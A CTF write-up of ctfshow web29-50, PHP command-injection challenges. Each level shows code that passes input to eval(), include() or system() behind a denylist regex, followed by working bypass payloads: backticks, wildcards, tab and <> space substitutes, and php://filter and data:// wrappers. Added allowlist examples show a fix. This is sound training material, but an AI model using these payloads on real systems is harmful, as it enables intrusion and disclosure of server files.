ctfshow: Web Basics, Command Execution (Part 1), web29-50
web29
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Only "flag" is filtered. First, see which files are in the directory: ?c=echo system('ls');
There are many ways to read the file from there:
?c=echo%20`cat%20f???.php`;
?c=echo `nl fl''ag.php`;
?c=echo system('cat f*');
flag{ae29365d-40d0-480c-b4d7-2f13c1e59e76}
web30
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
"flag", "system" and "php" are filtered.
As in the previous challenge, backticks execute the system command, and a wildcard (*) gets around the "flag" and "php" filters:
?c=echo `cat f*`;
flag{586e57e4-cd75-4dfe-9db9-dfada4998a6e}
web31
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Functions that can execute commands
Space bypasses (from CSDN)
1. Linux
%09 (tab; requires a PHP environment)
{cat,flag.txt}
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg
(\x20 converted to a string is a space; here the variable is used to smuggle it past the filter)
2. Windows
(Not widely applicable; essentially only the type command works)
type.\flag.txt
type,flag.txt
echo,123456
Reading files on Linux
cat: print file contents
more: page through file contents
head: show the first lines of a file
tail: show the last lines of a file
tac: cat spelled backwards, and it does the reverse, printing the lines in reverse order
nl: like cat -n, prints the whole file starting from the first line and adds line numbers automatically
less: similar to more, but more may not be able to page or search upward, while less can page and search freely in both directions
file -f: leaks file contents through its error messages (-f <namefile> names a file containing one or more file names, one per line, and file identifies each of them in turn)
Here backticks execute the command, nl reads the file, %09 stands in for the space, and * gets past the "flag" filter:
?c=echo%09`nl%09f*`;
flag{c2ae7f9e-4b53-46c3-a135-1a431f1c9835}
web32
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Parentheses and the semicolon are now filtered. The semicolon can be replaced with ?>, since closing the PHP tag also ends the statement. include pulls flag.php in, but PHP code that is included is executed rather than displayed, so combine it with the php://filter pseudo-protocol to read the file out base64-encoded:
/?c=include$_GET["a"]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
flag{929f27b2-e503-462e-b5e8-12453981ba6f}
web33
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
flag{31dd87f1-2229-476a-973b-79a01aafde5c}
web34
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
flag{83e18871-384e-456b-a377-d9b26f5c26a5}
web35
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
/?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
flag{06c2b8b7-2cec-42aa-a9e4-21bd315c5fbb}
web36
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Same payload as above:
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
flag{0f6540fa-806c-4006-a397-ae11a2af3231}
web37
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
Use the data:// pseudo-protocol to have include() execute PHP code; * gets past the "flag" filter: ?c=data://text/plain,<?php%20echo%20system(%27cat%20fl*%27);?>
flag{85557ae9-7c31-40e1-9425-fa4be0706389}
Or:
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
which base64-decodes to <?php system('cat flag.php');?>
The base64 payload must encode PHP code; base64-encoding the bare command does not work.
web38
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
Same payload as above:
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
flag{94c14a14-94e6-42f1-ba23-a704e23b0e92}
web39
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
}else{
    highlight_file(__FILE__);
}
?c=data://text/plain,<?php%20echo%20system(%27cat%20fl*%27);?>
flag{f938e65e-07fd-47f9-a9d4-70c0a42dd01a}
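From the defender's side, web29-39 show one pattern: each round adds tokens to a denylist regex, and each round is bypassed by a construct the list did not name (backticks, wildcards, %09, ?> in place of ;, php://filter, data://). The durable fix is to keep user input out of eval() and include() entirely and compare it against an allowlist. The following is an added example, not code from the ctfshow challenges; the action names and the readable file names are assumptions.

```php
<?php
// Added example, not ctfshow challenge code: a "run the action named by the
// user" endpoint without eval(), include($c) or a denylist regex.
declare(strict_types=1);

// Allowlist of action names; anything else is rejected before it is used.
const ALLOWED_ACTIONS = ['list', 'show'];

// Assumed file names the "show" action may read (a real app lists its own).
const READABLE_FILES = ['readme.txt', 'notes.txt'];

function run_action(array $get): string {
    $action = $get['c'] ?? '';
    // Strict, exact comparison: "include$_GET[a]?>", "echo`nl\tf*`;" and
    // "data://text/plain,..." are all rejected here without naming any of them.
    if (!is_string($action) || !in_array($action, ALLOWED_ACTIONS, true)) {
        return 'error: unknown action';
    }
    if ($action === 'list') {
        return implode("\n", array_diff(scandir(__DIR__), ['.', '..']));
    }
    // 'show': the name must equal one fixed entry; no paths, wrappers or globs.
    $file = $get['f'] ?? '';
    if (!is_string($file) || !in_array($file, READABLE_FILES, true)) {
        return 'error: file not allowed';
    }
    $content = @file_get_contents(__DIR__ . '/' . $file);
    return $content === false ? 'error: unreadable' : $content;
}

// Constructed probes: payloads quoted on this page plus one legitimate request.
$probes = [
    ['c' => 'include$_GET[a]?>', 'a' => 'php://filter/read=convert.base64-encode/resource=flag.php'],
    ['c' => "echo\t`nl\tf*`;"],
    ['c' => 'data://text/plain,<?php echo system(\'cat fl*\');?>'],
    ['c' => 'show', 'f' => '../flag.php'],
    ['c' => 'list'],
];
foreach ($probes as $p) {
    printf("%-44s => %s\n", $p['c'], strtok(run_action($p), "\n"));
}
```

Only the last probe produces a listing; the first four are refused by the same two comparisons, with no regex to extend the next time a new bypass appears.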
web40
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
The parentheses in the regex are not the ASCII ones; it is the full-width (Chinese) parentheses that are filtered...
print_r(scandir('.')); lists every file name in the current directory,
but '.' cannot be used, since both the quote and the dot are filtered.
localeconv() returns an array of locale numeric and monetary formatting information. Its first element is decimal_point, which is the string '.' in the default C locale, so localeconv() can supply the dot that cannot be typed.
current() returns the current element of an array, by default the first one:
?c=print_r(scandir(current(localeconv()))); prints the files in the current directory.
Alternatively, print_r(scandir(pos(localeconv()))); works, because pos is an alias of current. If both are filtered, reset() also works: it returns the first element of the array, or FALSE if the array is empty.
array_reverse() returns the array with its elements in reverse order.
The flag file is the second-to-last entry, so use next(array_reverse(...)):
?c=show_source(next(array_reverse(scandir(current(localeconv())))));
flag{002e5bab-55f6-4ac5-9d9d-5366a13e23e2}
web41
<?php
/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date: 2020-09-05 20:31:22
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show
*/
if(isset($_POST['c'])){
    $c = $_POST['c'];
    if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>
I couldn't work this one out; see the writeup: https://wp.ctf.show/d/137-ctfshow-web-web41
web42
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}
The appended >/dev/null 2>&1 discards all output, so a command separator is used to cut the redirection off from the command:
?c=cat%20flag.php;
flag{c44007d5-cea0-4ab0-9831-b1115918fad5}
web43
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
";" and "cat" are filtered.
Another separator can be used to split the command, and more replaces cat: ?c=more%20flag.php
flag{78dc3068-f906-4e3e-94ee-42415721ed55}
web44
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
?c=more%20fla*
ctfshow{5a2ba941-4b16-4259-8b82-6f091df28f62}
web45
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
A filter on the space was added; bypass it with %09: ?c=more%09fl*
ctfshow{87f59032-7a84-4f06-a8e8-b3cd802b1e53}
web46
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
Digits, $ and * are now filtered as well:
?c=more%09fla?.php
ctfshow{141af466-6482-457d-98f6-93964c2a3eee}
web47
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
?c=tac%09fla?.php
web48
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:06:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
?c=tac%09fla?.php
web49
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:22:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
?c=tac%09fl?g.php
web50
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
%09 is filtered, so <> is used in place of the space. <> and ? used together produce no output, so \ is used instead of ?:
c=tac<>fla\g.php
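The web42-50 handler appends " >/dev/null 2>&1" to unsanitized input and hands the string to system(), which is why every separator and space substitute on this page is interpreted by the shell. As an added example (not challenge code), here is the same "read a file" feature built so that the input is validated against a structural allowlist and then passed as a single quoted argument; DATA_DIR is an assumed path and the probe strings are taken from this page.

```php
<?php
// Added example, not ctfshow challenge code: web42-50 run
// system($c." >/dev/null 2>&1"), so ";", "%09", "<>", "?" and "*" are all
// read by /bin/sh. Here the input is never allowed to become shell syntax.
declare(strict_types=1);

// Assumed directory holding the only files the endpoint may read.
const DATA_DIR = '/var/app/public_docs';

// Returns the finished command, or null when the name is rejected.
function build_read_command(string $name): ?string {
    // Structural allowlist: letters, digits, _ and -, then exactly ".txt".
    // ";", "|", "&", tab, "<>", "?", "*", "\" and any path separator fail here.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $name)) {
        return null;
    }
    // Even a valid name travels as ONE quoted argument, so a later loosening
    // of the pattern cannot silently turn the name into shell syntax.
    return 'tac ' . escapeshellarg(DATA_DIR . '/' . $name);
}

// Judge the value as PHP presents it in $_GET, i.e. after URL decoding,
// so %09 is tested as a real tab and %20 as a real space.
function check_query(string $raw): string {
    $cmd = build_read_command(urldecode($raw));
    return $cmd === null ? 'rejected' : 'accepted: ' . $cmd;
}

// Constructed probes: the web42-50 inputs from this page and one legitimate name.
$probes = ['cat%20flag.php;', 'more%20flag.php', 'more%09fl*',
           'tac%09fla?.php', 'tac<>fla\g.php', 'notes.txt'];
foreach ($probes as $raw) {
    printf("%-18s => %s\n", $raw, check_query($raw));
}
```

Only notes.txt is accepted, as tac '/var/app/public_docs/notes.txt'; the denylist in the challenge grew by one token per level, while the allowlist here never needed to know which separator or space substitute came next.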